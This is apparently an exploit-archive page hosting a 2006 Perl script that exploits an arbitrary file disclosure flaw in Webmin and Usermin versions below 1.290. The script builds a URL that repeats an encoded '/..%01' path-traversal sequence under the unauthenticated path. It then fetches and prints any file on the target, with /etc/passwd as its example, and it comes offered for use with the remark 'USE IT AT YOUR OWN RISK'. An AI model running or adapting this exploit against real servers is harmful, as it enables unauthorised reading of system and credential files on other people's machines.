web-usermin.pl.txt

web-usermin.pl.txt: Posted Jul 15, 2006; Authored by UmZ! | Site securitydot.net; Webmin / Usermin arbitrary file disclosure exploit for versions below 1.290.; tags | exploit, arbitrary; SHA-256 | afc54ea99c84485e040b225373c421f91d929ffee60b37a21b28014919831ae8; Download | Favorite | View

web-usermin.pl.txt

#!/usr/bin/perl
#    Exploit for WEBMIN and USERMIN  less than 1.29x           
#    ARBITARY REMOTE FILE DISCLOSURE
#    WORKS FOR HTTP AND HTTPS (NOW)     
#    Thrusday 13th  July 2006
#    Vulnerability Disclosure at securitydot.net
#    Coded by UmZ! umz32.dll@gmail.com
#    
#  
#
#    Make sure you have LWP before using this exploit.
#    USE IT AT YOUR OWN RISK
#
#    GREETS to wiseguy, Anonymous Individual, Uquali......Jhant... Fakhru... etc........................
#    for other.. like AHMED n FAIZ ... (GET A LIFE MAN).



#    Revised on Friday 14th July 2006
use LWP::Simple;
use LWP::UserAgent;
my $userag = LWP::UserAgent->new;
  
if (@ARGV < 4) { 
                    print("Usage: $0 <url> <port> <filename> <target> \n"); 
                    print("TARGETS are\n ");
        print("0  - > HTTP \n");
        print(" 1  - > HTTPS\n");
        print("Define full path with file name \n");
        print("Example: ./webmin.pl blah.com 10000 /etc/passwd\n");
        exit(1); 
                    } 

                    ($target, $port,$filename, $tar) = @ARGV;

    print("WEBMIN EXPLOIT !!!!! coded by UmZ!\n");
    print("Comments and Suggestions are welcome at umz32.dll [at] gmail.com\n");
    print("Vulnerability disclose at securitydot.net\nI am just coding it in perl 'cuz I hate PHP!\n");
    print("Attacking $target on port $port!\n");
    print("FILENAME:  $filename\n");
    

    $temp="/..%01" x 40;
    
    if ($tar == '0')
      { my $url= "http://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
      $content=get $url;

      print("\n FILE CONTENT STARTED");
      print("\n -----------------------------------\n");

      print("$content");
      print("\n -------------------------------------\n");
       }

    
    elsif ($tar == '1')
       {
      my $url= "https://". $target. ":" . $port ."/unauthenticated/".$temp . $filename;
      my $req = HTTP::Request->new(GET => $url);
      my $res = $userag->request($req);
        if ($res->is_success) {
              print("FILE CONTENT STARTED\n");
        print("-------------------------------------------\n");
        print $res->as_string;
          print("-------------------------------------------\n");
            }
        else {
            print "Failed: ", $res->status_line, "\n";
             }
      }

Top Authors In Last 30 Days

Red Hat 227 files
indoushka 150 files
Jay Turla 150 files
Ubuntu 64 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,119)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,136)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,775)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,828)
UNIX (9,454)
UnixWare (188)
Windows (6,766)
Other

web-usermin.pl.txt

web-usermin.pl.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

web-usermin.pl.txt

Share This

web-usermin.pl.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems